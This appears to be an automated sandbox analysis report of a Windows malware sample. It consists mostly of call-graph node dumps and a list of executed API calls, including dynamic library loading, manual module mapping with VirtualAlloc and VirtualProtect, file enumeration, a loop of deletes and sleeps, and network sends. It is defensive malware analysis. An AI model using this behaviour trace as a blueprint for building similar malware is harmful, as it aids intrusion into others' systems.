54165->54132 54166->54148 54167->54149 54169 44680d HeapFree 54168->54169 54170 446836 __dosmaperr 54168->54170 54169->54170 54171 446822 54169->54171 54170->54155 54177 44062d 20 API calls _Atexit 54171->54177 54173 446828 GetLastError 54173->54170 54174->54153 54175->54159 54176->54162 54177->54173 54182 40515c 102 API calls 54179->54182 54181 405159 54182->54181 54183 44839e 54191 448790 54183->54191 54187 4483c7 54188 4483ba 54188->54187 54199 4483ca 11 API calls 54188->54199 54190 4483b2 54192 44854a __Getctype 5 API calls 54191->54192 54193 4487b7 54192->54193 54194 4487cf TlsAlloc 54193->54194 54195 4487c0 54193->54195 54194->54195 54196 43502b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 54195->54196 54197 4483a8 54196->54197 54197->54190 54198 448319 20 API calls 2 library calls 54197->54198 54198->54188 54199->54190 54200 100020db 54203 100020e7 ___DestructExceptionObject 54200->54203 54201 100020f6 54202 10002110 dllmain_raw 54202->54201 54204 1000212a 54202->54204 54203->54201 54203->54202 54208 1000210b 54203->54208 54213 10001eec 54204->54213 54206 10002177 54206->54201 54207 10001eec 29 API calls 54206->54207 54209 1000218a 54207->54209 54208->54201 54208->54206 54210 10001eec 29 API calls 54208->54210 54209->54201 54211 10002193 dllmain_raw 54209->54211 54212 1000216d dllmain_raw 54210->54212 54211->54201 54212->54206 54214 10001ef7 54213->54214 54215 10001f2a dllmain_crt_process_detach 54213->54215 54216 10001f1c dllmain_crt_process_attach 54214->54216 54217 10001efc 54214->54217 54222 10001f06 54215->54222 54216->54222 54218 10001f01 54217->54218 54219 10001f12 54217->54219 54218->54222 54223 1000240b 25 API calls 54218->54223 54224 100023ec 27 API calls 54219->54224 54222->54208 54223->54222 54224->54222 54225 434918 54226 434924 CallCatchBlock 54225->54226 54252 434627 54226->54252 54228 43492b 54230 434954 54228->54230 54558 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 54228->54558 54239 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 54230->54239 54263 4442d2 54230->54263 54234 434973 CallCatchBlock 54235 4349f3 54271 434ba5 54235->54271 54239->54235 54559 443487 36 API calls 5 library calls 54239->54559 54253 434630 54252->54253 54564 434cb6 IsProcessorFeaturePresent 54253->54564 54255 43463c 54565 438fb1 54255->54565 54257 434641 54258 434645 54257->54258 54574 44415f 54257->54574 54258->54228 54261 43465c 54261->54228 54265 4442e9 54263->54265 54264 43502b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 54266 43496d 54264->54266 54265->54264 54266->54234 54267 444276 54266->54267 54268 4442a5 54267->54268 54269 43502b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 54268->54269 54270 4442ce 54269->54270 54270->54239 54272 436f10 ___scrt_fastfail 54271->54272 54273 434bb8 GetStartupInfoW 54272->54273 54274 4349f9 54273->54274 54275 444223 54274->54275 54624 44f0d9 54275->54624 54277 44422c 54279 434a02 54277->54279 54628 446895 36 API calls 54277->54628 54280 40ea00 54279->54280 54758 41cbe1 LoadLibraryA GetProcAddress 54280->54758 54282 40ea1c GetModuleFileNameW 54763 40f3fe 54282->54763 54284 40ea38 54285 4020f6 28 API calls 54284->54285 54286 40ea47 54285->54286 54287 4020f6 28 API calls 54286->54287 54288 40ea56 54287->54288 54289 41beac 28 API calls 54288->54289 54290 40ea5f 54289->54290 54778 40fb52 54290->54778 54292 40ea68 54293 401e8d 11 API calls 54292->54293 54294 40ea71 54293->54294 54295 40ea84 54294->54295 54296 40eace 54294->54296 54976 40fbee 118 API calls 54295->54976 54298 401e65 22 API calls 54296->54298 54300 40eade 54298->54300 54299 40ea96 54301 401e65 22 API calls 54299->54301 54303 401e65 22 API calls 54300->54303 54302 40eaa2 54301->54302 54977 410f72 36 API calls __EH_prolog 54302->54977 54304 40eafd 54303->54304 54305 40531e 28 API calls 54304->54305 54307 40eb0c 54305->54307 54309 406383 28 API calls 54307->54309 54308 40eab4 54978 40fb9f 78 API calls 54308->54978 54311 40eb18 54309->54311 54313 401fe2 28 API calls 54311->54313 54312 40eabd 54979 40f3eb 71 API calls 54312->54979 54315 40eb24 54313->54315 54316 401fd8 11 API calls 54315->54316 54317 40eb2d 54316->54317 54319 401fd8 11 API calls 54317->54319 54321 40eb36 54319->54321 54322 401e65 22 API calls 54321->54322 54323 40eb3f 54322->54323 54324 401fc0 28 API calls 54323->54324 54325 40eb4a 54324->54325 54326 401e65 22 API calls 54325->54326 54327 40eb63 54326->54327 54328 401e65 22 API calls 54327->54328 54329 40eb7e 54328->54329 54330 40ebe9 54329->54330 54980 406c59 54329->54980 54331 401e65 22 API calls 54330->54331 54337 40ebf6 54331->54337 54333 40ebab 54334 401fe2 28 API calls 54333->54334 54335 40ebb7 54334->54335 54336 401fd8 11 API calls 54335->54336 54339 40ebc0 54336->54339 54338 40ec3d 54337->54338 54343 413584 3 API calls 54337->54343 54782 40d0a4 54338->54782 54985 413584 RegOpenKeyExA 54339->54985 54349 40ec21 54343->54349 54347 40f38a 55078 4139e4 30 API calls 54347->55078 54349->54338 54988 4139e4 30 API calls 54349->54988 54357 40f3a0 55079 4124b0 65 API calls ___scrt_fastfail 54357->55079 54558->54228 54559->54235 54564->54255 54566 438fb6 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 54565->54566 54578 43a4ba 54566->54578 54570 438fcc 54571 438fd7 54570->54571 54592 43a4f6 DeleteCriticalSection 54570->54592 54571->54257 54573 438fc4 54573->54257 54620 44fbe8 54574->54620 54577 438fda 8 API calls 3 library calls 54577->54258 54579 43a4c3 54578->54579 54581 43a4ec 54579->54581 54583 438fc0 54579->54583 54593 438eff 54579->54593 54598 43a4f6 DeleteCriticalSection 54581->54598 54583->54573 54584 43a46c 54583->54584 54613 438e14 54584->54613 54586 43a476 54587 43a481 54586->54587 54618 438ec2 6 API calls try_get_function 54586->54618 54587->54570 54589 43a48f 54590 43a49c 54589->54590 54619 43a49f 6 API calls ___vcrt_FlsFree 54589->54619 54590->54570 54592->54573 54599 438cf3 54593->54599 54596 438f22 54596->54579 54597 438f36 InitializeCriticalSectionAndSpinCount 54597->54596 54598->54583 54600 438d23 54599->54600 54601 438d27 54599->54601 54600->54601 54603 438d47 54600->54603 54606 438d93 54600->54606 54601->54596 54601->54597 54603->54601 54604 438d53 GetProcAddress 54603->54604 54605 438d63 __crt_fast_encode_pointer 54604->54605 54605->54601 54607 438dbb LoadLibraryExW 54606->54607 54610 438db0 54606->54610 54608 438dd7 GetLastError 54607->54608 54609 438def 54607->54609 54608->54609 54611 438de2 LoadLibraryExW 54608->54611 54609->54610 54612 438e06 FreeLibrary 54609->54612 54610->54600 54611->54609 54612->54610 54614 438cf3 try_get_function 5 API calls 54613->54614 54615 438e2e 54614->54615 54616 438e37 54615->54616 54617 438e46 TlsAlloc 54615->54617 54616->54586 54618->54589 54619->54587 54623 44fc01 54620->54623 54621 43502b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 54622 43464e 54621->54622 54622->54261 54622->54577 54623->54621 54625 44f0eb 54624->54625 54626 44f0e2 54624->54626 54625->54277 54629 44efd8 54626->54629 54628->54277 54630 448295 __Getctype 36 API calls 54629->54630 54631 44efe5 54630->54631 54649 44f0f7 54631->54649 54633 44efed 54658 44ed6c 54633->54658 54636 44f004 54636->54625 54639 44f047 54642 446802 _free 20 API calls 54639->54642 54642->54636 54643 44f042 54682 44062d 20 API calls _Atexit 54643->54682 54645 44f08b 54645->54639 54683 44ec42 20 API calls 54645->54683 54646 44f05f 54646->54645 54647 446802 _free 20 API calls 54646->54647 54647->54645 54650 44f103 CallCatchBlock 54649->54650 54651 448295 __Getctype 36 API calls 54650->54651 54656 44f10d 54651->54656 54653 44f191 CallCatchBlock 54653->54633 54656->54653 54657 446802 _free 20 API calls 54656->54657 54684 446175 36 API calls 4 library calls 54656->54684 54685 445909 EnterCriticalSection 54656->54685 54686 44f188 LeaveCriticalSection std::_Lockit::~_Lockit 54656->54686 54657->54656 54659 43a837 __cftof 36 API calls 54658->54659 54660 44ed7e 54659->54660 54661 44ed8d GetOEMCP 54660->54661 54662 44ed9f 54660->54662 54664 44edb6 54661->54664 54663 44eda4 GetACP 54662->54663 54662->54664 54663->54664 54664->54636 54665 4461b8 54664->54665 54666 4461f6 54665->54666 54667 4461c6 __Getctype 54665->54667 54688 44062d 20 API calls _Atexit 54666->54688 54667->54666 54668 4461e1 RtlAllocateHeap 54667->54668 54687 443001 7 API calls 2 library calls 54667->54687 54668->54667 54670 4461f4 54668->54670 54670->54639 54672 44f199 54670->54672 54673 44ed6c 38 API calls 54672->54673 54674 44f1b8 54673->54674 54677 44f209 IsValidCodePage 54674->54677 54679 44f1bf 54674->54679 54681 44f22e ___scrt_fastfail 54674->54681 54675 43502b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 54676 44f03a 54675->54676 54676->54643 54676->54646 54678 44f21b GetCPInfo 54677->54678 54677->54679 54678->54679 54678->54681 54679->54675 54689 44ee44 GetCPInfo 54681->54689 54682->54639 54683->54639 54684->54656 54685->54656 54686->54656 54687->54667 54688->54670 54690 44ef28 54689->54690 54691 44ee7e 54689->54691 54694 43502b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 54690->54694 54699 4511ac 54691->54699 54696 44efd4 54694->54696 54696->54679 54698 44aee6 _swprintf 41 API calls 54698->54690 54700 43a837 __cftof 36 API calls 54699->54700 54701 4511cc MultiByteToWideChar 54700->54701 54703 45120a 54701->54703 54710 4512a2 54701->54710 54705 4461b8 ___crtLCMapStringA 21 API calls 54703->54705 54709 45122b __alloca_probe_16 ___scrt_fastfail 54703->54709 54704 43502b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 54706 44eedf 54704->54706 54705->54709 54713 44aee6 54706->54713 54707 45129c 54718 435ecd 20 API calls _free 54707->54718 54709->54707 54711 451270 MultiByteToWideChar 54709->54711 54710->54704 54711->54707 54712 45128c GetStringTypeW 54711->54712 54712->54707 54714 43a837 __cftof 36 API calls 54713->54714 54715 44aef9 54714->54715 54719 44acc9 54715->54719 54718->54710 54720 44ace4 ___crtLCMapStringA 54719->54720 54721 44ad0a MultiByteToWideChar 54720->54721 54722 44ad34 54721->54722 54723 44aebe 54721->54723 54727 4461b8 ___crtLCMapStringA 21 API calls 54722->54727 54729 44ad55 __alloca_probe_16 54722->54729 54724 43502b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 54723->54724 54725 44aed1 54724->54725 54725->54698 54726 44ad9e MultiByteToWideChar 54728 44adb7 54726->54728 54741 44ae0a 54726->54741 54727->54729 54746 448c33 54728->54746 54729->54726 54729->54741 54733 44ade1 54737 448c33 _strftime 11 API calls 54733->54737 54733->54741 54734 44ae19 54735 4461b8 ___crtLCMapStringA 21 API calls 54734->54735 54740 44ae3a __alloca_probe_16 54734->54740 54735->54740 54736 44aeaf 54754 435ecd 20 API calls _free 54736->54754 54737->54741 54739 448c33 _strftime 11 API calls 54742 44ae8e 54739->54742 54740->54736 54740->54739 54755 435ecd 20 API calls _free 54741->54755 54742->54736 54743 44ae9d WideCharToMultiByte 54742->54743 54743->54736 54744 44aedd 54743->54744 54756 435ecd 20 API calls _free 54744->54756 54747 44854a __Getctype 5 API calls 54746->54747 54748 448c5a 54747->54748 54751 448c63 54748->54751 54757 448cbb 10 API calls 3 library calls 54748->54757 54750 448ca3 LCMapStringW 54750->54751 54752 43502b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 54751->54752 54753 448cb5 54752->54753 54753->54733 54753->54734 54753->54741 54754->54741 54755->54723 54756->54741 54757->54750 54759 41cc20 LoadLibraryA GetProcAddress 54758->54759 54760 41cc10 GetModuleHandleA GetProcAddress 54758->54760 54761 41cc49 44 API calls 54759->54761 54762 41cc39 LoadLibraryA GetProcAddress 54759->54762 54760->54759 54761->54282 54762->54761 55080 41b539 FindResourceA 54763->55080 54766 43bda0 ___std_exception_copy 21 API calls 54767 40f428 ctype 54766->54767 54768 4020b7 28 API calls 54767->54768 54769 40f443 54768->54769 54770 401fe2 28 API calls 54769->54770 54771 40f44e 54770->54771 54772 401fd8 11 API calls 54771->54772 54773 40f457 54772->54773 54774 43bda0 ___std_exception_copy 21 API calls 54773->54774 54775 40f468 ctype 54774->54775 55083 406e13 54775->55083 54777 40f49b 54777->54284 54779 40fb5e 54778->54779 54781 40fb65 54778->54781 55086 402163 11 API calls 54779->55086 54781->54292 55087 401fab 54782->55087 54976->54299 54977->54308 54978->54312 54981 4020df 11 API calls 54980->54981 54982 406c65 54981->54982 54983 4032a0 28 API calls 54982->54983 54984 406c82 54983->54984 54984->54333 54986 40ebdf 54985->54986 54987 4135ae RegQueryValueExA RegCloseKey 54985->54987 54986->54330 54986->54347 54987->54986 54988->54338 55078->54357 55081 41b556 LoadResource LockResource SizeofResource 55080->55081 55082 40f419 55080->55082 55081->55082 55082->54766 55084 4020b7 28 API calls 55083->55084 55085 406e27 55084->55085 55085->54777 55086->54781 55447 4129da 55448 4129ec 55447->55448 55449 4041a2 28 API calls 55448->55449 55450 4129ff 55449->55450 55451 4020f6 28 API calls 55450->55451 55452 412a0e 55451->55452 55453 4020f6 28 API calls 55452->55453 55454 412a1d 55453->55454 55455 41beac 28 API calls 55454->55455 55456 412a26 55455->55456 55457 412ace 55456->55457 55459 401e65 22 API calls 55456->55459 55458 401e8d 11 API calls 55457->55458 55460 412ad7 55458->55460 55461 412a3d 55459->55461 55462 401fd8 11 API calls 55460->55462 55463 4020f6 28 API calls 55461->55463 55464 412ae0 55462->55464 55465 412a48 55463->55465 55466 401fd8 11 API calls 55464->55466 55467 401e65 22 API calls 55465->55467 55468 412ae8 55466->55468 55469 412a53 55467->55469 55470 4020f6 28 API calls 55469->55470 55471 412a5e 55470->55471 55472 401e65 22 API calls 55471->55472 55473 412a69 55472->55473 55474 4020f6 28 API calls 55473->55474 55475 412a74 55474->55475 55476 401e65 22 API calls 55475->55476 55477 412a7f 55476->55477 55478 4020f6 28 API calls 55477->55478 55479 412a8a 55478->55479 55480 401e65 22 API calls 55479->55480 55481 412a95 55480->55481 55482 4020f6 28 API calls 55481->55482 55483 412aa0 55482->55483 55484 401e65 22 API calls 55483->55484 55485 412aae 55484->55485 55486 4020f6 28 API calls 55485->55486 55487 412ab9 55486->55487 55491 412aef GetModuleFileNameW 55487->55491 55492 4020df 11 API calls 55491->55492 55493 412b1a 55492->55493 55494 4020df 11 API calls 55493->55494 55495 412b26 55494->55495 55496 4020df 11 API calls 55495->55496 55519 412b32 55496->55519 55497 40da23 32 API calls 55497->55519 55498 401fd8 11 API calls 55498->55519 55499 41ba09 43 API calls 55499->55519 55500 4185a3 31 API calls 55500->55519 55501 412c58 Sleep 55501->55519 55502 40417e 28 API calls 55502->55519 55503 4042fc 84 API calls 55503->55519 55504 40431d 28 API calls 55504->55519 55505 401f09 11 API calls 55505->55519 55506 412cfa Sleep 55506->55519 55507 403014 28 API calls 55507->55519 55508 412d9c Sleep 55508->55519 55509 41c516 32 API calls 55509->55519 55510 412dff DeleteFileW 55510->55519 55511 412e36 DeleteFileW 55511->55519 55512 412e61 55514 412e72 DeleteFileW 55512->55514 55512->55519 55527 401f09 11 API calls 55512->55527 55530 412eff 55512->55530 55513 412e88 Sleep 55513->55519 55514->55519 55515 412f01 55516 401f09 11 API calls 55515->55516 55517 412f0d 55516->55517 55518 401f09 11 API calls 55517->55518 55520 412f19 55518->55520 55519->55497 55519->55498 55519->55499 55519->55500 55519->55501 55519->55502 55519->55503 55519->55504 55519->55505 55519->55506 55519->55507 55519->55508 55519->55509 55519->55510 55519->55511 55519->55512 55519->55513 55519->55515 55523 412ecd Sleep 55519->55523 55521 401f09 11 API calls 55520->55521 55522 412f25 55521->55522 55524 40b93f 28 API calls 55522->55524 55525 401f09 11 API calls 55523->55525 55526 412f38 55524->55526 55525->55512 55528 4020f6 28 API calls 55526->55528 55527->55512 55529 412f58 55528->55529 55639 413268 55529->55639 55530->55522 55532 412f63 55533 401f09 11 API calls 55532->55533 55534 412f6f 55533->55534 55535 4130e3 55534->55535 55536 412f8f 55534->55536 55537 41bdaf 28 API calls 55535->55537 55538 41bdaf 28 API calls 55536->55538 55539 4130ec 55537->55539 55540 412f9b 55538->55540 55541 402f31 28 API calls 55539->55541 55542 41bc1f 28 API calls 55540->55542 55543 413123 55541->55543 55544 412fb5 55542->55544 55545 402f10 28 API calls 55543->55545 55546 402f31 28 API calls 55544->55546 55547 413132 55545->55547 55548 412fe5 55546->55548 55549 402f10 28 API calls 55547->55549 55550 402f10 28 API calls 55548->55550 55551 41313e 55549->55551 55552 412ff4 55550->55552 55553 402f10 28 API calls 55551->55553 55554 402f10 28 API calls 55552->55554 55555 41314d 55553->55555 55556 413003 55554->55556 55557 402f10 28 API calls 55555->55557 55558 402f10 28 API calls 55556->55558 55560 41315c 55557->55560 55559 413012 55558->55559 55562 402f10 28 API calls 55559->55562 55561 402f10 28 API calls 55560->55561 55563 41316b 55561->55563 55564 413021 55562->55564 55565 402f10 28 API calls 55563->55565 55566 402f10 28 API calls 55564->55566 55567 41317a 55565->55567 55568 41302d 55566->55568 55653 402ea1 28 API calls 55567->55653 55570 402f10 28 API calls 55568->55570 55572 413039 55570->55572 55571 413184 55573 404aa1 61 API calls 55571->55573 55651 402ea1 28 API calls 55572->55651 55575 413191 55573->55575 55577 401fd8 11 API calls 55575->55577 55576 413048 55578 402f10 28 API calls 55576->55578 55579 41319d 55577->55579 55580 413054 55578->55580 55581 401fd8 11 API calls 55579->55581 55652 402ea1 28 API calls 55580->55652 55583 4131a9 55581->55583 55585 401fd8 11 API calls 55583->55585 55584 41305e 55586 404aa1 61 API calls 55584->55586 55587 4131b5 55585->55587 55588 41306b 55586->55588 55589 401fd8 11 API calls 55587->55589 55590 401fd8 11 API calls 55588->55590 55592 4131c1 55589->55592 55591 413074 55590->55591 55594 401fd8 11 API calls 55591->55594 55593 401fd8 11 API calls 55592->55593 55595 4131ca 55593->55595 55596 41307d 55594->55596 55597 401fd8 11 API calls 55595->55597 55598 401fd8 11 API calls 55596->55598 55599 4131d3 55597->55599 55600 413086 55598->55600 55601 401fd8 11 API calls 55599->55601 55602 401fd8 11 API calls 55600->55602 55603 4130d7 55601->55603 55604 41308f 55602->55604 55606 401fd8 11 API calls 55603->55606 55605 401fd8 11 API calls 55604->55605 55607 41309b 55605->55607 55608 4131e5 55606->55608 55609 401fd8 11 API calls 55607->55609 55610 401f09 11 API calls 55608->55610 55611 4130a7 55609->55611 55612 4131f1 55610->55612 55613 401fd8 11 API calls 55611->55613 55614 401fd8 11 API calls 55612->55614 55615 4130b3 55613->55615 55616 4131fd 55614->55616 55617 401fd8 11 API calls 55615->55617 55618 401fd8 11 API calls 55616->55618 55619 4130bf 55617->55619 55620 413209 55618->55620 55621 401fd8 11 API calls 55619->55621 55623 401fd8 11 API calls 55620->55623 55622 4130cb 55621->55622 55625 401fd8 11 API calls 55622->55625 55624 413215 55623->55624 55626 401fd8 11 API calls 55624->55626 55625->55603 55627 413221 55626->55627 55628 401fd8 11 API calls 55627->55628 55629 41322d 55628->55629 55630 401fd8 11 API calls 55629->55630 55631 413239 55630->55631 55632 401fd8 11 API calls 55631->55632 55633 413245 55632->55633 55634 401fd8 11 API calls 55633->55634 55635 413251 55634->55635 55636 401fd8 11 API calls 55635->55636 55637 412abe 55636->55637 55638 404e26 99 API calls 55637->55638 55638->55457 55640 4132a6 55639->55640 55642 413277 55639->55642 55641 4132b5 55640->55641 55654 10001c5b 55640->55654 55643 40417e 28 API calls 55641->55643 55658 411d2d 55642->55658 55645 4132c1 55643->55645 55647 401fd8 11 API calls 55645->55647 55649 4132ca 55647->55649 55649->55532 55651->55576 55652->55584 55653->55571 55655 10001c6b ___scrt_fastfail 55654->55655 55662 100012ee 55655->55662 55657 10001c87 55657->55641 55704 411d39 55658->55704 55661 411fa2 22 API calls ___std_exception_copy 55661->55640 55663 10001324 ___scrt_fastfail 55662->55663 55664 100013b7 GetEnvironmentVariableW 55663->55664 55688 100010f1 55664->55688 55667 100010f1 51 API calls 55668 10001465 55667->55668 55669 100010f1 51 API calls 55668->55669 55670 10001479 55669->55670 55671 100010f1 51 API calls 55670->55671 55672 1000148d 55671->55672 55673 100010f1 51 API calls 55672->55673 55674 100014a1 55673->55674 55675 100010f1 51 API calls 55674->55675 55676 100014b5 lstrlenW 55675->55676 55677 100014d2 55676->55677 55678 100014d9 lstrlenW 55676->55678 55677->55657 55679 100010f1 51 API calls 55678->55679 55680 10001501 lstrlenW lstrcatW 55679->55680 55681 100010f1 51 API calls 55680->55681 55682 10001539 lstrlenW lstrcatW 55681->55682 55683 100010f1 51 API calls 55682->55683 55684 1000156b lstrlenW lstrcatW 55683->55684 55685 100010f1 51 API calls 55684->55685 55686 1000159d lstrlenW lstrcatW 55685->55686 55687 100010f1 51 API calls 55686->55687 55687->55677 55689 10001118 ___scrt_fastfail 55688->55689 55690 10001129 lstrlenW 55689->55690 55701 10002c40 55690->55701 55692 10001148 lstrcatW lstrlenW 55693 10001177 lstrlenW FindFirstFileW 55692->55693 55694 10001168 lstrlenW 55692->55694 55695 100011a0 55693->55695 55696 100011e1 55693->55696 55694->55693 55697 100011c7 FindNextFileW 55695->55697 55698 100011aa 55695->55698 55696->55667 55697->55695 55700 100011da FindClose 55697->55700 55698->55697 55703 10001000 51 API calls ___scrt_fastfail 55698->55703 55700->55696 55702 10002c57 55701->55702 55702->55692 55702->55702 55703->55698 55739 4117d7 55704->55739 55706 411d57 55707 411d6d SetLastError 55706->55707 55708 4117d7 SetLastError 55706->55708 55735 411d35 55706->55735 55707->55735 55709 411d8a 55708->55709 55709->55707 55711 411dac GetNativeSystemInfo 55709->55711 55709->55735 55712 411df2 55711->55712 55723 411dff SetLastError 55712->55723 55742 411cde VirtualAlloc 55712->55742 55715 411e22 55716 411e47 GetProcessHeap HeapAlloc 55715->55716 55768 411cde VirtualAlloc 55715->55768 55717 411e70 55716->55717 55718 411e5e 55716->55718 55721 4117d7 SetLastError 55717->55721 55769 411cf5 VirtualFree 55718->55769 55724 411eb9 55721->55724 55722 411e3a 55722->55716 55722->55723 55723->55735 55725 411f6b 55724->55725 55743 411cde VirtualAlloc 55724->55743 55770 4120b2 GetProcessHeap HeapFree 55725->55770 55728 411ed2 ctype 55744 4117ea 55728->55744 55730 411efe 55730->55725 55748 411b9a 55730->55748 55734 411f36 55734->55725 55734->55735 55764 1000220c 55734->55764 55735->55661 55736 411f5c 55736->55735 55737 411f60 SetLastError 55736->55737 55737->55725 55740 4117e6 55739->55740 55741 4117db SetLastError 55739->55741 55740->55706 55741->55706 55742->55715 55743->55728 55745 4118c0 55744->55745 55746 411816 ctype ___scrt_fastfail 55744->55746 55745->55730 55746->55745 55747 4117d7 SetLastError 55746->55747 55747->55746 55749 411bbb IsBadReadPtr 55748->55749 55756 411ca5 55748->55756 55752 411bd5 55749->55752 55749->55756 55753 411cbd SetLastError 55752->55753 55754 411ca7 SetLastError 55752->55754 55755 411c8a IsBadReadPtr 55752->55755 55752->55756 55771 440f5d 55752->55771 55753->55756 55754->55756 55755->55752 55755->55756 55756->55725 55758 41198a 55756->55758 55762 4119b0 55758->55762 55759 411a99 55760 4118ed VirtualProtect 55759->55760 55761 411aab 55760->55761 55761->55734 55762->55759 55762->55761 55786 4118ed 55762->55786 55765 10002215 55764->55765 55766 1000221a dllmain_dispatch 55764->55766 55790 100022b1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 55765->55790 55766->55736 55768->55722 55769->55723 55770->55735 55772 446206 55771->55772 55773 446213 55772->55773 55774 44621e 55772->55774 55775 4461b8 ___crtLCMapStringA 21 API calls 55773->55775 55776 446226 55774->55776 55782 44622f __Getctype 55774->55782 55780 44621b 55775->55780 55777 446802 _free 20 API calls 55776->55777 55777->55780 55778 446234 55784 44062d 20 API calls _Atexit 55778->55784 55779 446259 RtlReAllocateHeap 55779->55780 55779->55782 55780->55752 55782->55778 55782->55779 55785 443001 7 API calls 2 library calls 55782->55785 55784->55780 55785->55782 55787 4118fe 55786->55787 55789 4118f6 55786->55789 55788 411971 VirtualProtect 55787->55788 55787->55789 55788->55789 55789->55762 55790->55766 55791 42f97e 55792 42f989 55791->55792 55793 42f99d 55792->55793 55795 432f7f 55792->55795 55796 432f8a 55795->55796 55797 432f8e 55795->55797 55796->55793 55798 440f5d 22 API calls 55797->55798 55798->55796 55799 40165e 55800 401666 55799->55800 55802 401669 55799->55802 55801 4016a8 55803 43455e new 22 API calls 55801->55803 55802->55801 55804 401696 55802->55804 55805 40169c 55803->55805 55806 43455e new 22 API calls 55804->55806 55806->55805 55807 426cdc 55812 426d59 send 55807->55812 55813 10001f3f 55814 10001f4b ___DestructExceptionObject 55813->55814 55831 1000247c 55814->55831 55816 10001f52 55817 10002041 55816->55817 55818 10001f7c 55816->55818 55823 10001f57 ___scrt_is_nonwritable_in_current_image 55816->55823 55847 10002639 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 55817->55847 55842 100023de IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 55818->55842 55821 10002048 55822 10001f8b __RTC_Initialize 55822->55823 55843 100022fc RtlInitializeSListHead 55822->55843 55825 10001f99 ___scrt_initialize_default_local_stdio_options 55844 100046c5 5 API calls _ValidateLocalCookies 55825->55844 55827 10001fad 55827->55823 55845 100023b3 IsProcessorFeaturePresent ___isa_available_init ___scrt_release_startup_lock 55827->55845 55829 10001fb8 55829->55823 55846 10004669 5 API calls _ValidateLocalCookies 55829->55846 55832 10002485 55831->55832 55848 10002933 IsProcessorFeaturePresent 55832->55848 55834 10002491 55849 100034ea 55834->55849 55836 10002496 55841 1000249a 55836->55841 55858 100053c8 55836->55858 55839 100024b1 55839->55816 55841->55816 55842->55822 55843->55825 55844->55827 55845->55829 55846->55823 55847->55821 55848->55834 55850 100034ef ___vcrt_initialize_winapi_thunks 55849->55850 55862 10003936 6 API calls 2 library calls 55850->55862 55852 100034f9 55853 100034fd 55852->55853 55863 100038e8 55852->55863 55853->55836 55855 10003505 55856 10003510 55855->55856 55871 10003972 RtlDeleteCriticalSection 55855->55871 55856->55836 55890 10007457 55858->55890 55861 10003529 7 API calls 3 library calls 55861->55841 55862->55852 55872 10003af1 55863->55872 55867 1000390b 55868 10003918 55867->55868 55878 1000391b 5 API calls ___vcrt_FlsFree 55867->55878 55868->55855 55870 100038fd 55870->55855 55871->55853 55879 10003a82 55872->55879 55874 10003b0b 55875 10003b24 TlsAlloc 55874->55875 55876 100038f2 55874->55876 55876->55870 55877 10003ba2 5 API calls try_get_function 55876->55877 55877->55867 55878->55870 55880 10003aaa 55879->55880 55882 10003aa6 __crt_fast_encode_pointer 55879->55882 55880->55882 55883 100039be 55880->55883 55882->55874 55885 100039cd try_get_first_available_module 55883->55885 55884 100039ea LoadLibraryExW 55884->55885 55886 10003a05 GetLastError 55884->55886 55885->55884 55887 10003a60 FreeLibrary 55885->55887 55888 10003a77 55885->55888 55889 10003a38 LoadLibraryExW 55885->55889 55886->55885 55887->55885 55888->55882 55889->55885 55893 10007470 55890->55893 55891 10002ada _ValidateLocalCookies 5 API calls 55892 100024a3 55891->55892 55892->55839 55892->55861 55893->55891 55894 10005bff 55902 10005d5c 55894->55902 55896 10005c13 55899 10005c1b 55900 10005c28 55899->55900 55910 10005c2b 10 API calls 55899->55910 55903 10005c45 _abort 4 API calls 55902->55903 55904 10005d83 55903->55904 55905 10005d9b TlsAlloc 55904->55905 55906 10005d8c 55904->55906 55905->55906 55907 10002ada _ValidateLocalCookies 5 API calls 55906->55907 55908 10005c09 55907->55908 55908->55896 55909 10005b7a 19 API calls 2 library calls 55908->55909 55909->55899 55910->55896

                                                Executed Functions

                                                Function 0041CBE1 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
